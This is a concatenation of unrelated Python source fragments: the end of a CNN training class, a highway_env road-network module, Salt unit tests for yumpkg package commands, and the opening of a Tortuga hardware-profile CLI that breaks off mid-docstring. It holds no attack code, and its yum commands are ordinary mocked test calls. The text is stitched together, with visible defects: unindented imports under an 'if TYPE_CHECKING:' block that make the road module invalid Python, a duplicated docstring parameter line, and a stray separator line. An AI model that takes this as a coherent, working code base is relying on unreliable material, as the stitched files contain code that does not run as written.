        self.cnn.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
        hist = self.cnn.model.fit(train_imgs, train_labels, epochs=num_epochs, validation_split=val_split, shuffle=True)
        # Optional: Plot learning curves
        # fig, axes = plt.subplots(1,2, figsize=(20,5))
        # plot_curve("Learning Curve(CNN)",
        #            hist.history['accuracy'],
        #            hist.history['loss'],
        #            hist.history['val_accuracy'],
        #            hist.history['val_loss'],
        #            num_epochs,
        #            axes, ylim=(0.0, 1.01))
        return hist.history['val_accuracy'][-1], hist.history['val_loss'][-1]

    def test(self, test_imgs, test_labels):
        """Evaluate the trained model on held-out data.

        :return: (test accuracy, test loss)
        """
        test_loss, test_acc = self.cnn.model.evaluate(test_imgs, test_labels, verbose=0)
        print("Test Accuracy: %.4f, test on %d images" % (test_acc, len(test_labels)))
        return test_acc, test_loss
# ---- end of concatenated file segment ----
# filename: highway_env/road/road.py
import numpy as np
import pandas as pd
import logging
from typing import List, Tuple, Dict, TYPE_CHECKING, Optional
from highway_env.logger import Loggable
from highway_env.road.lane import LineType, StraightLane, AbstractLane
if TYPE_CHECKING:
from highway_env.vehicle import kinematics
from highway_env.road import objects
logger = logging.getLogger(__name__)

# A lane is identified by (origin node, destination node, lane id on the road).
LaneIndex = Tuple[str, str, int]
# A route is an ordered list of lane indexes to follow.
Route = List[LaneIndex]
class RoadNetwork(object):
    """A directed graph of road nodes; each edge (from, to) carries the list
    of lanes joining the two nodes."""

    graph: Dict[str, Dict[str, List[AbstractLane]]]

    def __init__(self):
        self.graph = {}

    def add_lane(self, _from: str, _to: str, lane: AbstractLane) -> None:
        """
        A lane is encoded as an edge in the road network.

        :param _from: the node at which the lane starts.
        :param _to: the node at which the lane ends.
        :param AbstractLane lane: the lane geometry.
        """
        if _from not in self.graph:
            self.graph[_from] = {}
        if _to not in self.graph[_from]:
            self.graph[_from][_to] = []
        self.graph[_from][_to].append(lane)

    def get_lane(self, index: LaneIndex) -> AbstractLane:
        """
        Get the lane geometry corresponding to a given index in the road network.

        :param index: a tuple (origin node, destination node, lane id on the road).
        :return: the corresponding lane geometry.
        """
        _from, _to, _id = index
        # A missing lane id is tolerated when the road has a single lane.
        if _id is None and len(self.graph[_from][_to]) == 1:
            _id = 0
        return self.graph[_from][_to][_id]

    def get_closest_lane_index(self, position: np.ndarray) -> LaneIndex:
        """
        Get the index of the lane closest to a world position.

        :param position: a world position [m].
        :return: the index of the closest lane.
        """
        indexes, distances = [], []
        for _from, to_dict in self.graph.items():
            for _to, lanes in to_dict.items():
                for _id, l in enumerate(lanes):
                    distances.append(l.distance(position))
                    indexes.append((_from, _to, _id))
        return indexes[int(np.argmin(distances))]

    def next_lane(self, current_index: LaneIndex, route: Route = None, position: np.ndarray = None,
                  np_random: np.random.RandomState = np.random) -> LaneIndex:
        """
        Get the index of the next lane that should be followed after finishing the current lane.

        If a plan is available and matches with current lane, follow it.
        Else, pick next road randomly.
        If it has the same number of lanes as current road, stay in the same lane.
        Else, pick next road's closest lane.

        :param current_index: the index of the current lane.
        :param route: the planned route, if any (mutated: completed steps are popped).
        :param route: the planned route, if any.
        :param position: the vehicle position.
        :param np_random: a source of randomness.
        :return: the index of the next lane to be followed when current lane is finished.
        """
        _from, _to, _id = current_index
        next_to = None
        # Pick next road according to planned route
        if route:
            if route[0][:2] == current_index[:2]:  # We just finished the first step of the route, drop it.
                route.pop(0)
            if route and route[0][0] == _to:  # Next road in route is starting at the end of current road.
                _, next_to, _ = route[0]  # the route's lane id is currently unused
            elif route:
                logger.warning("Route {} does not start after current road {}.".format(route[0], current_index))
        # Randomly pick next road
        if not next_to:
            try:
                next_to = list(self.graph[_to].keys())[np_random.randint(len(self.graph[_to]))]
            except KeyError:
                # End of lane reached: no outgoing road, keep the current lane.
                return current_index
        # If next road has same number of lanes, stay on the same lane
        if len(self.graph[_from][_to]) == len(self.graph[_to][next_to]):
            next_id = _id
        # Else, pick the closest lane of the next road
        else:
            lanes = range(len(self.graph[_to][next_to]))
            next_id = min(lanes,
                          key=lambda l: self.get_lane((_to, next_to, l)).distance(position))
        return _to, next_to, next_id

    def bfs_paths(self, start: str, goal: str) -> List[List[str]]:
        """
        Breadth-first search of all routes from start to goal.

        :param start: starting node
        :param goal: goal node
        :return: generator of paths from start to goal; yields [] for a node
                 with no outgoing edges.
        """
        queue = [(start, [start])]
        while queue:
            (node, path) = queue.pop(0)
            if node not in self.graph:
                # Bug fix: the original fell through after this yield and
                # raised KeyError on self.graph[node] below when the
                # generator was consumed past its first value.
                yield []
                continue
            for _next in set(self.graph[node].keys()) - set(path):
                if _next == goal:
                    yield path + [_next]
                elif _next in self.graph:
                    queue.append((_next, path + [_next]))

    def shortest_path(self, start: str, goal: str) -> List[str]:
        """
        Breadth-first search of shortest path from start to goal.

        :param start: starting node
        :param goal: goal node
        :return: shortest path from start to goal, or [] if none exists.
        """
        return next(self.bfs_paths(start, goal), [])

    def all_side_lanes(self, lane_index: LaneIndex) -> List[LaneIndex]:
        """
        :param lane_index: the index of a lane.
        :return: all lanes belonging to the same road.
        """
        return [(lane_index[0], lane_index[1], i) for i in range(len(self.graph[lane_index[0]][lane_index[1]]))]

    def side_lanes(self, lane_index: LaneIndex) -> List[LaneIndex]:
        """
        :param lane_index: the index of a lane.
        :return: indexes of lanes next to an input lane, to its right or left.
        """
        _from, _to, _id = lane_index
        lanes = []
        if _id > 0:
            lanes.append((_from, _to, _id - 1))
        if _id < len(self.graph[_from][_to]) - 1:
            lanes.append((_from, _to, _id + 1))
        return lanes

    @staticmethod
    def is_same_road(lane_index_1: LaneIndex, lane_index_2: LaneIndex, same_lane: bool = False) -> bool:
        """Is lane 1 in the same road as lane 2?"""
        return lane_index_1[:2] == lane_index_2[:2] and (not same_lane or lane_index_1[2] == lane_index_2[2])

    @staticmethod
    def is_leading_to_road(lane_index_1: LaneIndex, lane_index_2: LaneIndex, same_lane: bool = False) -> bool:
        """Is lane 1 leading to of lane 2?"""
        return lane_index_1[1] == lane_index_2[0] and (not same_lane or lane_index_1[2] == lane_index_2[2])

    def is_connected_road(self, lane_index_1: LaneIndex, lane_index_2: LaneIndex, route: Route = None,
                          same_lane: bool = False, depth: int = 0) -> bool:
        """
        Is the lane 2 leading to a road within lane 1's route?

        Vehicles on these lanes must be considered for collisions.

        :param lane_index_1: origin lane
        :param lane_index_2: target lane
        :param route: route from origin lane, if any
        :param same_lane: compare lane id
        :param depth: search depth from lane 1 along its route
        :return: whether the roads are connected
        """
        if RoadNetwork.is_same_road(lane_index_2, lane_index_1, same_lane) \
                or RoadNetwork.is_leading_to_road(lane_index_2, lane_index_1, same_lane):
            return True
        if depth > 0:
            if route and route[0][:2] == lane_index_1[:2]:
                # Route is starting at current road, skip it
                return self.is_connected_road(lane_index_1, lane_index_2, route[1:], same_lane, depth)
            elif route and route[0][0] == lane_index_1[1]:
                # Route is continuing from current road, follow it
                return self.is_connected_road(route[0], lane_index_2, route[1:], same_lane, depth - 1)
            else:
                # Recursively search all roads at intersection
                _from, _to, _id = lane_index_1
                return any([self.is_connected_road((_to, l1_to, _id), lane_index_2, route, same_lane, depth - 1)
                            for l1_to in self.graph.get(_to, {}).keys()])
        return False

    def lanes_list(self) -> List[AbstractLane]:
        """Flatten the network into the list of all lane geometries."""
        return [lane for to in self.graph.values() for ids in to.values() for lane in ids]

    @staticmethod
    def straight_road_network(lanes: int = 4, length: float = 10000, angle: float = 0) -> 'RoadNetwork':
        """Build a network made of a single straight road with parallel lanes."""
        net = RoadNetwork()
        for lane in range(lanes):
            origin = np.array([0, lane * StraightLane.DEFAULT_WIDTH])
            end = np.array([length, lane * StraightLane.DEFAULT_WIDTH])
            rotation = np.array([[np.cos(angle), np.sin(angle)], [-np.sin(angle), np.cos(angle)]])
            origin = rotation @ origin
            end = rotation @ end
            # Outermost lines are continuous; inner separators are striped.
            line_types = [LineType.CONTINUOUS_LINE if lane == 0 else LineType.STRIPED,
                          LineType.CONTINUOUS_LINE if lane == lanes - 1 else LineType.NONE]
            net.add_lane("0", "1", StraightLane(origin, end, line_types=line_types))
        return net

    def position_heading_along_route(self, route: Route, longitudinal: float, lateral: float) \
            -> Tuple[np.ndarray, float]:
        """
        Get the absolute position and heading along a route composed of several lanes at some local coordinates.

        :param route: a planned route, list of lane indexes
        :param longitudinal: longitudinal position
        :param lateral: : lateral position
        :return: position, heading
        """
        # Consume whole lanes from the route until the longitudinal offset
        # falls within the first remaining lane.
        while len(route) > 1 and longitudinal > self.get_lane(route[0]).length:
            longitudinal -= self.get_lane(route[0]).length
            route = route[1:]
        return self.get_lane(route[0]).position(longitudinal, lateral), self.get_lane(route[0]).heading_at(longitudinal)
class Road(Loggable):
    """
    A road is a set of lanes, and a set of vehicles driving on these lanes
    """

    def __init__(self,
                 network: RoadNetwork = None,
                 vehicles: List['kinematics.Vehicle'] = None,
                 road_objects: List['objects.RoadObject'] = None,
                 np_random: np.random.RandomState = None,
                 record_history: bool = False) -> None:
        """
        New road.

        :param network: the road network describing the lanes
        :param vehicles: the vehicles driving on the road
        :param road_objects: the objects on the road including obstacles and landmarks
        :param np.random.RandomState np_random: a random number generator for vehicle behaviour
        :param record_history: whether the recent trajectories of vehicles should be recorded for display
        """
        self.network = network
        self.vehicles = vehicles or []
        self.objects = road_objects or []
        self.np_random = np_random if np_random else np.random.RandomState()
        self.record_history = record_history

    def close_vehicles_to(self, vehicle: 'kinematics.Vehicle', distance: float, count: int = None,
                          see_behind: bool = True) -> object:
        """Return the vehicles within *distance* of *vehicle*, sorted by
        absolute longitudinal gap (closest first).

        :param vehicle: the reference vehicle (excluded from the result)
        :param distance: Euclidean radius [m]
        :param count: if given, keep only the *count* closest vehicles
        :param see_behind: if False, discard vehicles more than two vehicle
            lengths behind the reference vehicle
        :return: list of nearby vehicles
        """
        vehicles = [v for v in self.vehicles
                    if np.linalg.norm(v.position - vehicle.position) < distance
                    and v is not vehicle
                    and (see_behind or -2 * vehicle.LENGTH < vehicle.lane_distance_to(v))]
        vehicles = sorted(vehicles, key=lambda v: abs(vehicle.lane_distance_to(v)))
        if count:
            vehicles = vehicles[:count]
        return vehicles

    def act(self) -> None:
        """
        Decide the actions of each entity on the road.
        """
        for vehicle in self.vehicles:
            vehicle.act()

    def step(self, dt: float) -> None:
        """
        Step the dynamics of each entity on the road.

        :param dt: timestep [s]
        """
        for vehicle in self.vehicles:
            vehicle.step(dt)
        # Pairwise collision check is O(n^2) over all vehicle pairs (each
        # ordered pair is visited once, including v against itself).
        # TODO: create a shallow copy of vehicles list(vehicle.copy()) and pop crashed vehicles from it to reduce
        # complexity and prevent multiple checks
        for vehicle in self.vehicles:
            for other in self.vehicles:
                vehicle.check_collision(other)
            for other in self.objects:
                vehicle.check_collision(other)

    def neighbour_vehicles(self, vehicle: 'kinematics.Vehicle', lane_index: LaneIndex = None) \
            -> Tuple[Optional['kinematics.Vehicle'], Optional['kinematics.Vehicle']]:
        """
        Find the preceding and following vehicles of a given vehicle.

        :param vehicle: the vehicle whose neighbours must be found
        :param lane_index: the lane on which to look for preceding and following vehicles.
                     It doesn't have to be the current vehicle lane but can also be another lane, in which case the
                     vehicle is projected on it considering its local coordinates in the lane.
        :return: its preceding vehicle, its following vehicle
        """
        lane_index = lane_index or vehicle.lane_index
        if not lane_index:
            return None, None
        lane = self.network.get_lane(lane_index)
        s = self.network.get_lane(lane_index).local_coordinates(vehicle.position)[0]
        s_front = s_rear = None
        v_front = v_rear = None
        for v in self.vehicles + self.objects:
            # The "and True" keeps a disabled connectivity filter in place
            # (see the commented-out is_connected_road call).
            if v is not vehicle and True:  # self.network.is_connected_road(v.lane_index, lane_index, same_lane=True):
                s_v, lat_v = lane.local_coordinates(v.position)
                if not lane.on_lane(v.position, s_v, lat_v, margin=1):
                    continue
                # "<=" means that among equally-distant front candidates the
                # last one encountered wins; for the rear, the first one does.
                if s <= s_v and (s_front is None or s_v <= s_front):
                    s_front = s_v
                    v_front = v
                if s_v < s and (s_rear is None or s_v > s_rear):
                    s_rear = s_v
                    v_rear = v
        return v_front, v_rear

    def dump(self) -> None:
        """
        Dump the data of all entities on the road
        """
        for v in self.vehicles:
            v.dump()

    def get_log(self) -> pd.DataFrame:
        """
        Concatenate the logs of all entities on the road.

        :return: the concatenated log.
        """
        return pd.concat([v.get_log() for v in self.vehicles])

    def __repr__(self):
        return self.vehicles.__repr__()
# ---- end of concatenated file segment ----
# -*- coding: utf-8 -*-
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
Mock,
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt libs
import salt.modules.yumpkg as yumpkg
# Fixture: parsed contents of the stock CentOS 7 repo files, as returned by
# yumpkg.list_repos(). The 'updates-source' gpgkey previously contained a
# '<KEY>' redaction placeholder; restored to the CentOS-7 key path used by
# every other entry so the fixture is internally consistent.
LIST_REPOS = {
    'base': {
        'file': '/etc/yum.repos.d/CentOS-Base.repo',
        'gpgcheck': '1',
        'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
        'mirrorlist': 'http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os&infra=$infra',
        'name': 'CentOS-$releasever - Base'
    },
    'base-source': {
        'baseurl': 'http://vault.centos.org/centos/$releasever/os/Source/',
        'enabled': '0',
        'file': '/etc/yum.repos.d/CentOS-Sources.repo',
        'gpgcheck': '1',
        'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
        'name': 'CentOS-$releasever - Base Sources'
    },
    'updates': {
        'file': '/etc/yum.repos.d/CentOS-Base.repo',
        'gpgcheck': '1',
        'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
        'mirrorlist': 'http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates&infra=$infra',
        'name': 'CentOS-$releasever - Updates'
    },
    'updates-source': {
        'baseurl': 'http://vault.centos.org/centos/$releasever/updates/Source/',
        'enabled': '0',
        'file': '/etc/yum.repos.d/CentOS-Sources.repo',
        'gpgcheck': '1',
        'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
        'name': 'CentOS-$releasever - Updates Sources'
    }
}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class YumTestCase(TestCase, LoaderModuleMockMixin):
    '''
    Test cases for salt.modules.yumpkg
    '''
    def setup_loader_modules(self):
        '''
        Inject a minimal __context__/__grains__ so yumpkg behaves like a
        RHEL 7 minion whose package manager is the classic ``yum`` binary.
        '''
        return {
            yumpkg: {
                '__context__': {
                    'yum_bin': 'yum',
                },
                '__grains__': {
                    'osarch': 'x86_64',
                    'os_family': 'RedHat',
                    'osmajorrelease': 7,
                },
            }
        }
    def test_latest_version_with_options(self):
        '''
        latest_version must translate fromrepo / enablerepo / disablerepo /
        branch into the matching yum command-line flags.
        '''
        with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})):
            # with fromrepo
            cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.latest_version(
                    'foo',
                    refresh=False,
                    fromrepo='good',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '--quiet', '--disablerepo=*', '--enablerepo=good',
                     '--branch=foo', 'list', 'available', 'foo'],
                    ignore_retcode=True,
                    output_loglevel='trace',
                    python_shell=False)
            # without fromrepo
            cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.latest_version(
                    'foo',
                    refresh=False,
                    enablerepo='good',
                    disablerepo='bad',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '--quiet', '--disablerepo=bad', '--enablerepo=good',
                     '--branch=foo', 'list', 'available', 'foo'],
                    ignore_retcode=True,
                    output_loglevel='trace',
                    python_shell=False)
    def test_list_repo_pkgs_with_options(self):
        '''
        Test list_repo_pkgs with and without fromrepo
        NOTE: mock_calls is a stack. The most recent call is indexed
        with 0, while the first call would have the highest index.
        '''
        really_old_yum = MagicMock(return_value='3.2.0')
        older_yum = MagicMock(return_value='3.4.0')
        newer_yum = MagicMock(return_value='3.4.5')
        list_repos_mock = MagicMock(return_value=LIST_REPOS)
        kwargs = {'output_loglevel': 'trace',
                  'ignore_retcode': True,
                  'python_shell': False}
        with patch.object(yumpkg, 'list_repos', list_repos_mock):
            # Test with really old yum. The fromrepo argument has no effect on
            # the yum commands we'd run.
            with patch.dict(yumpkg.__salt__, {'cmd.run': really_old_yum}):
                cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
                with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                    yumpkg.list_repo_pkgs('foo')
                    # We should have called cmd.run_all twice
                    self.assertEqual(len(cmd.mock_calls), 2)
                    # Check args from first call
                    self.assertEqual(
                        cmd.mock_calls[1][1],
                        (['yum', '--quiet', 'list', 'available'],)
                    )
                    # Check kwargs from first call
                    self.assertEqual(cmd.mock_calls[1][2], kwargs)
                    # Check args from second call
                    self.assertEqual(
                        cmd.mock_calls[0][1],
                        (['yum', '--quiet', 'list', 'installed'],)
                    )
                    # Check kwargs from second call
                    self.assertEqual(cmd.mock_calls[0][2], kwargs)
            # Test with older yum (3.4.x): --showduplicates is supported, but
            # the fromrepo argument still has no effect on the commands we run.
            with patch.dict(yumpkg.__salt__, {'cmd.run': older_yum}):
                cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
                with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                    yumpkg.list_repo_pkgs('foo')
                    # We should have called cmd.run_all twice
                    self.assertEqual(len(cmd.mock_calls), 2)
                    # Check args from first call
                    self.assertEqual(
                        cmd.mock_calls[1][1],
                        (['yum', '--quiet', '--showduplicates', 'list', 'available'],)
                    )
                    # Check kwargs from first call
                    self.assertEqual(cmd.mock_calls[1][2], kwargs)
                    # Check args from second call
                    self.assertEqual(
                        cmd.mock_calls[0][1],
                        (['yum', '--quiet', '--showduplicates', 'list', 'installed'],)
                    )
                    # Check kwargs from second call
                    self.assertEqual(cmd.mock_calls[0][2], kwargs)
            # Test with newer yum. We should run one yum command per repo, so
            # fromrepo would limit how many calls we make.
            with patch.dict(yumpkg.__salt__, {'cmd.run': newer_yum}):
                # When fromrepo is used, we would only run one yum command, for
                # that specific repo.
                cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
                with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                    yumpkg.list_repo_pkgs('foo', fromrepo='base')
                    # We should have called cmd.run_all once
                    self.assertEqual(len(cmd.mock_calls), 1)
                    # Check args
                    self.assertEqual(
                        cmd.mock_calls[0][1],
                        (['yum', '--quiet', '--showduplicates',
                          'repository-packages', 'base', 'list', 'foo'],)
                    )
                    # Check kwargs
                    self.assertEqual(cmd.mock_calls[0][2], kwargs)
                # Test enabling base-source and disabling updates. We should
                # get two calls, one for each enabled repo. Because dict
                # iteration order will vary, different Python versions will be
                # do them in different orders, which is OK, but it will just
                # mean that we will have to check both the first and second
                # mock call both times.
                cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
                with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                    yumpkg.list_repo_pkgs(
                        'foo',
                        enablerepo='base-source',
                        disablerepo='updates')
                    # We should have called cmd.run_all twice
                    self.assertEqual(len(cmd.mock_calls), 2)
                    for repo in ('base', 'base-source'):
                        for index in (0, 1):
                            try:
                                # Check args
                                self.assertEqual(
                                    cmd.mock_calls[index][1],
                                    (['yum', '--quiet', '--showduplicates',
                                      'repository-packages', repo, 'list',
                                      'foo'],)
                                )
                                # Check kwargs
                                self.assertEqual(cmd.mock_calls[index][2], kwargs)
                                break
                            except AssertionError:
                                continue
                        else:
                            self.fail("repo '{0}' not checked".format(repo))
    def test_list_upgrades_dnf(self):
        '''
        The subcommand should be "upgrades" with dnf
        '''
        with patch.dict(yumpkg.__context__, {'yum_bin': 'dnf'}):
            # with fromrepo
            cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.list_upgrades(
                    refresh=False,
                    fromrepo='good',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['dnf', '--quiet', '--disablerepo=*', '--enablerepo=good',
                     '--branch=foo', 'list', 'upgrades'],
                    output_loglevel='trace',
                    ignore_retcode=True,
                    python_shell=False)
            # without fromrepo
            cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.list_upgrades(
                    refresh=False,
                    enablerepo='good',
                    disablerepo='bad',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['dnf', '--quiet', '--disablerepo=bad', '--enablerepo=good',
                     '--branch=foo', 'list', 'upgrades'],
                    output_loglevel='trace',
                    ignore_retcode=True,
                    python_shell=False)
    def test_list_upgrades_yum(self):
        '''
        The subcommand should be "updates" with yum
        '''
        # with fromrepo
        cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
            yumpkg.list_upgrades(
                refresh=False,
                fromrepo='good',
                branch='foo')
            cmd.assert_called_once_with(
                ['yum', '--quiet', '--disablerepo=*', '--enablerepo=good',
                 '--branch=foo', 'list', 'updates'],
                output_loglevel='trace',
                ignore_retcode=True,
                python_shell=False)
        # without fromrepo
        cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
            yumpkg.list_upgrades(
                refresh=False,
                enablerepo='good',
                disablerepo='bad',
                branch='foo')
            cmd.assert_called_once_with(
                ['yum', '--quiet', '--disablerepo=bad', '--enablerepo=good',
                 '--branch=foo', 'list', 'updates'],
                output_loglevel='trace',
                ignore_retcode=True,
                python_shell=False)
    def test_refresh_db_with_options(self):
        '''
        refresh_db must forward repo/branch options to both the clean and the
        check-update commands, and must skip check-update when disabled.
        '''
        with patch('salt.utils.pkg.clear_rtag', Mock()):
            # With check_update=True we will do a cmd.run to run the clean_cmd, and
            # then a separate cmd.retcode to check for updates.
            # with fromrepo
            clean_cmd = Mock()
            update_cmd = MagicMock(return_value=0)
            with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd,
                                              'cmd.retcode': update_cmd}):
                yumpkg.refresh_db(
                    check_update=True,
                    fromrepo='good',
                    branch='foo')
                clean_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=*',
                     '--enablerepo=good', '--branch=foo'],
                    python_shell=False)
                update_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'check-update',
                     '--setopt=autocheck_running_kernel=false', '--disablerepo=*',
                     '--enablerepo=good', '--branch=foo'],
                    output_loglevel='trace',
                    ignore_retcode=True,
                    python_shell=False)
            # without fromrepo
            clean_cmd = Mock()
            update_cmd = MagicMock(return_value=0)
            with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd,
                                              'cmd.retcode': update_cmd}):
                yumpkg.refresh_db(
                    check_update=True,
                    enablerepo='good',
                    disablerepo='bad',
                    branch='foo')
                clean_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=bad',
                     '--enablerepo=good', '--branch=foo'],
                    python_shell=False)
                update_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'check-update',
                     '--setopt=autocheck_running_kernel=false', '--disablerepo=bad',
                     '--enablerepo=good', '--branch=foo'],
                    output_loglevel='trace',
                    ignore_retcode=True,
                    python_shell=False)
            # With check_update=False we will just do a cmd.run for the clean_cmd
            # with fromrepo
            clean_cmd = Mock()
            with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd}):
                yumpkg.refresh_db(
                    check_update=False,
                    fromrepo='good',
                    branch='foo')
                clean_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=*',
                     '--enablerepo=good', '--branch=foo'],
                    python_shell=False)
            # without fromrepo
            clean_cmd = Mock()
            with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd}):
                yumpkg.refresh_db(
                    check_update=False,
                    enablerepo='good',
                    disablerepo='bad',
                    branch='foo')
                clean_cmd.assert_called_once_with(
                    ['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=bad',
                     '--enablerepo=good', '--branch=foo'],
                    python_shell=False)
    def test_install_with_options(self):
        '''
        install must forward repo/branch options to the yum install command.
        '''
        parse_targets = MagicMock(return_value=({'foo': None}, 'repository'))
        with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})), \
                patch.object(yumpkg, 'list_holds', MagicMock(return_value=[])), \
                patch.dict(yumpkg.__salt__, {'pkg_resource.parse_targets': parse_targets}), \
                patch('salt.utils.systemd.has_scope', MagicMock(return_value=False)):
            # with fromrepo
            cmd = MagicMock(return_value={'retcode': 0})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.install(
                    refresh=False,
                    fromrepo='good',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '-y', '--disablerepo=*', '--enablerepo=good',
                     '--branch=foo', 'install', 'foo'],
                    output_loglevel='trace',
                    python_shell=False,
                    redirect_stderr=True)
            # without fromrepo
            cmd = MagicMock(return_value={'retcode': 0})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.install(
                    refresh=False,
                    enablerepo='good',
                    disablerepo='bad',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '-y', '--disablerepo=bad', '--enablerepo=good',
                     '--branch=foo', 'install', 'foo'],
                    output_loglevel='trace',
                    python_shell=False,
                    redirect_stderr=True)
    def test_upgrade_with_options(self):
        '''
        upgrade must forward repo/branch/exclude options to the yum upgrade
        command.
        '''
        with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})), \
                patch('salt.utils.systemd.has_scope', MagicMock(return_value=False)):
            # with fromrepo
            cmd = MagicMock(return_value={'retcode': 0})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.upgrade(
                    refresh=False,
                    fromrepo='good',
                    exclude='kernel*',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '--quiet', '-y', '--disablerepo=*', '--enablerepo=good',
                     '--branch=foo', '--exclude=kernel*', 'upgrade'],
                    output_loglevel='trace',
                    python_shell=False)
            # without fromrepo
            cmd = MagicMock(return_value={'retcode': 0})
            with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
                yumpkg.upgrade(
                    refresh=False,
                    enablerepo='good',
                    disablerepo='bad',
                    exclude='kernel*',
                    branch='foo')
                cmd.assert_called_once_with(
                    ['yum', '--quiet', '-y', '--disablerepo=bad', '--enablerepo=good',
                     '--branch=foo', '--exclude=kernel*', 'upgrade'],
                    output_loglevel='trace',
                    python_shell=False)
|
# Copyright 2008-2018 Univa Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import os.path
from typing import Optional
from tortuga.cli.tortugaCli import TortugaCli
from tortuga.cli.utils import ParseOperatingSystemArgAction, parse_tags
from tortuga.exceptions.invalidCliRequest import InvalidCliRequest
from tortuga.exceptions.invalidProfileCreationTemplate import \
InvalidProfileCreationTemplate
from tortuga.objects.hardwareProfile import HardwareProfile
from tortuga.wsapi.hardwareProfileWsApi import HardwareProfileWsApi
class CreateHardwareProfileCli(TortugaCli):
    """
    CLI for creating a hardware profile, either from a JSON template file
    or from individual command-line options (options override the template).
    """

    def parseArgs(self, usage: Optional[str] = None):
        """Register the command-line options for this command."""
        option_group_name = _('Create Hardware Profile Options')
        self.addOptionGroup(option_group_name, '')
        # '-j/--json-file' is a hidden legacy alias for '-t/--template'
        self.addOptionToGroup(option_group_name, '-j', '--json-file',
                              dest='jsonTemplatePath', help=argparse.SUPPRESS)
        self.addOptionToGroup(option_group_name, '-t', '--template',
                              dest='jsonTemplatePath',
                              help=_('Path to JSON-formatted hardware profile'
                                     ' creation template'))
        # Deprecated '--name' option, superseded by the positional NAME
        self.addOptionToGroup(
            option_group_name, '--name', dest='deprecated_name',
            help=argparse.SUPPRESS
        )
        self.addOptionToGroup(option_group_name, '--description',
                              dest='description',
                              help=_('Hardware profile description'))
        self.addOptionToGroup(option_group_name, '--os',
                              action=ParseOperatingSystemArgAction,
                              metavar='OS SPEC',
                              dest='os',
                              help=_('Hardware profile operating system'))
        self.addOptionToGroup(option_group_name, '--name-format',
                              dest='nameFormat',
                              help=_('Host name format'))
        self.addOptionToGroup(option_group_name, '--tags',
                              dest='tags', metavar='key=value[,key=value]',
                              action='append',
                              help='Key-value pairs associated with the '
                                   'hardware profile')
        self.addOptionToGroup(option_group_name, '--defaults',
                              dest='bUseDefaults', default=False,
                              action='store_true',
                              help=_('Do not use any defaults when'
                                     ' creating the hardware profile'))
        self.getParser().add_argument(
            'name', metavar='NAME', nargs='?', help=_('Hardware profile name')
        )
        super().parseArgs(usage=usage)

    def runCommand(self):
        """
        Build the hardware profile dict (template + option overrides) and
        submit it via the hardware profile web-service API.

